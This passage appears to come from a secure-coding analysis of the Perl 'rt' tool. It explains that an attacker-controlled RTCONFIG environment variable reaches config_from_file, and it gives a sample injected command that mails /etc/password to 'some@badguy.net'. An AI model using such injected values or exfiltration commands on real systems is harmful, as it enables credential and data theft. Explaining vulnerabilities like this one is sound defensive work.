...
This subroutine is called by the subroutine config_from_file, which is itself invoked ofrom the following:
| Code Block | ||
|---|---|---|
| ||
config_from_file($ENV{RTCONFIG} || ".rtrc"), |
Since any user can invoke the rt executable with environment variables they control, a hostile user may set the RTCONFIG environment variable to a malicious command, such as:
| Code Block | ||
|---|---|---|
| ||
cat /etc/password | mail some@badguy.net | |
...